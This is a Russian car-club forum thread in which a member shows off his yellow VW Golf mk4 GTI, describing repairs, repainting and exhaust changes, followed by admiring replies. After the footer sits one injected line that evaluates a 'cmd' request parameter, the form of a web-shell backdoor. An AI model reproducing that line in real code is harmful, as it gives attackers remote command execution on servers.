+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 28

Тема: Жжжелток


  1. #1
    GTI-Racing senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold Аватар для senka
    Регистрация
    22.01.2009
    Откуда
    Москва
    Машина
    VW Golf 5 E30
    Сообщений
    1,095

    Жжжелток

    По многочисленным просьбам одноклубников)))) :preved:

    Мой Желток, 2003 года издания, юбилейка, рожденная для США, с очень большими колесами, правильными тормозами AP Racing, интеркулером APR, х.з. каким 3-х дюймовым выпуском и х.з с какой прошивкой :laugh:

    Честно не видел особо смысла выкладывать здесь своего Желтка, т.к. мне кажется интереснее наблюдать за тем как машина меняется и преображается. Я же в свою очередь когда приобрел данный автомобиль, твердо верил, что ничего менять уже в нем не буду. Он полностью меня устраивал внешне и технические характеристики тоже вполне для меня подходили. Но время проходит и кое что я все таки сделал)))) я заранее извиняюсь, но почти ничего не было запечатлено документально, так что понять как было, и как стало весьма затруднительно...


    вот таким он ко мне попал, в октябре 2009 года

    Вложение 3298

    сразу убрал дефлекторы с боковых стекол, потому что не нравится и повез его отмываться!
    Внешне Желток выглядел очень хорошо. единственное что меня удручало, это что на задней арке я обнаружил очаг коррозии, и то что краска начинает отколупливаться. :expect: немного подумав мы с другом засели в гараж, зашкурили больное место до металла, нанесли сверху грунт и оставили все это дело до весны.
    Салон тоже был в идеальном состоянии (и таким и остается:acute:), за исключением водительского сиденья. выглядело оно вот так
    Вложение 3296

    опросив всех знакомых, с помощью ребят из ГТИ-Гаража, я нашел место, где это можно починить. получилось вот так
    Вложение 3297
    полностью про это можно почитать тут
    http://www.gti-club.ru/forum/showthread.php?t=11192

    кроме этого, сразу после покупки я провел полное техническое обследование своего авто, ничего плохого найдено не было, и я поменял масло, фильтры и прочие расходники, начал наслаждаться машиной в полной мере. Единственной вещью, которая омрачила мое беззаботное существование, оказался расходомер, который умер и не пожелал оживать. Знающие люди подсказали, что причиной стал как ни банально это звучит, фильтр нулевого сопротивления. Немного взвесив все за и против, я отказался от него в пользу стандартного. Сейчас посещают мысли об установке другой системы впуска, но это надо все еще раз тщательно обдумать.
    на этом до весны я успокоился :expect:

    по весне, я решил привести внешний вид Желтка в порядок, чтобы он красивый и яркий радовал окружающих своим существованием:laugh:

    первая попытка оказалась не очень удачной :expect: красили мне заднее крыло, и бампер заодно я решил тоже покрасить чтобы избавиться от всяких царапин. результат не оправдал моих ожиданий - ребята хреново подобрали цвет, покрасили с переходом, и на крыле у Желтка появилось яркое пятно! послушав различные мнения, я решил это дело перекрашивать. в сервисе ребята с пониманием отнеслись к моей просьбе, единственное условие, что краску я подбираю самостоятельно.
    потратив 3 часа в кунцево краска была подобрана, и машин вернули на перекрас. к тому моменту у меня родились идеи, которые реализовались вместе с перекрасом. во первых мне надоел передний номер, закрывающий пол-интеркулера, во вторых в заднем бампере было расширено посадочное место тоже под номер. Результат превзошел все мои ожидания: мне очень понравилось, как машинка смотриться без переднего номера, так понравилось, что он на бампер так и не вернулся :laugh: задний бампер же превратился из американского в европейский.



    ну и конечно цвет подобрали очень хорошо, на этот раз все очень хорошо получилось.

    в промежутке между покрасками, я немного подправил выхлоп у своего Желтка. не нравился мне резонанс возникающий на определенных оборотах, я решил от него избавляться. оказалось что проблема решалась просто. всего навсего вырезали пламегаситель, и поставили вместо него прямую трубу. теперь это выглядит так



    также ввиду отсутствия какой либо насадки на глушителе, поставили вот такую


    звук преобразился и стал гораздо больше мне нравится))) думаю выпуск переделывать дальше смысла и не было, т.к. и так уже был даунпайп 3 дюйма, ну и дальше до самой банки труба 3 дюйма и дошла.

    свои летние колеса, привлекающие очень много внимания окружающих, по весне я отдал в РЛД на профилактику. все таки 235/35 дают о себе знать)))

    и вот мой машин в том виде, в котором он сейчас.

    немножко фоток








    это фотки после первой, неудачной покраски, на зимней резине. Огромное спасибо Олегу (BONу) за эти фотографии :friends: надеюсь что как нибудь под настроение Желток попозирует ему на летних тапочках :prayer: а пока немного моих, уже не таких красивых фоток









    ну вот как то так))) о дальнейших свершениях постараюсь сообщать, если конечно это кому то интересно :laugh:

  2. #2
    весьма нарядный)

  3. #3
    GTI-Racing TyMAH is on a distinguished road Аватар для TyMAH
    Регистрация
    09.04.2007
    Откуда
    MSK
    Машина
    Octavia II RS
    Сообщений
    182
    Шикарный! :) Желтки решают!;)
    ПОДПИСЬ

  4. #4
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Один из немногих в прямом смысле слова ярких авто ))))

    Летние колеса мну очень нра.
    песок сыпется....не останавливайтесь на достигнутом !

  5. #5
    Супер Модератор Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Аватар для Spaceman
    Регистрация
    13.01.2009
    Откуда
    Moscow
    Машина
    GTI Overload
    Сообщений
    6,561
    Клёвый желток! Очень нра, диски в тему!

  6. #6
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    Крассавчик!!! Давно надо было выкладывать!!!
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  7. #7
    GTI-Racing SOLOBARIC is on a distinguished road Аватар для SOLOBARIC
    Регистрация
    12.02.2007
    Откуда
    Москва
    Машина
    MK VI GTI
    Сообщений
    948
    Желток Тохи)зачетный суко!

  8. #8
    GTI-Racing keks is on a distinguished road Аватар для keks
    Регистрация
    25.01.2008
    Откуда
    Москва
    Машина
    mk4 25th anniversary
    Сообщений
    794
    Шикарный авто. диски зачетные)
    I love GTIclub

  9. #9
    GTI-Racing TishONE is on a distinguished road Аватар для TishONE
    Регистрация
    20.07.2008
    Откуда
    MSK
    Машина
    vRS FL 2011 (Race Blue)
    Сообщений
    1,139
    ббратуль! Имхо лучший 4ый ГТИ который я видел!!!
    MK2 GTI EV - ПРОДАНА.
    Hyundai Sonata 2.0 - ПРОДАНА.
    MK4 GTI AUM - ПРОДАНА.
    Skoda Octavia vRS - ПРОДАНА.
    BMW 116i - ПРОДАНА.
    Land Rover Discovery 4 HSE - комфорт превыше всего)

  10. #10
    GTI-Racing senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold Аватар для senka
    Регистрация
    22.01.2009
    Откуда
    Москва
    Машина
    VW Golf 5 E30
    Сообщений
    1,095
    Цитата Сообщение от SaNeK G4 Посмотреть сообщение
    Желток Тохи)
    угу, а до этого Кости)))) какая разница, главное что теперь он мой)))))

    всем спасибо)))

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Жжжелток
    от shim_forever в разделе Клубные машины
    Ответов: 6
    Последнее сообщение: 25.10.2013, 20:00

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}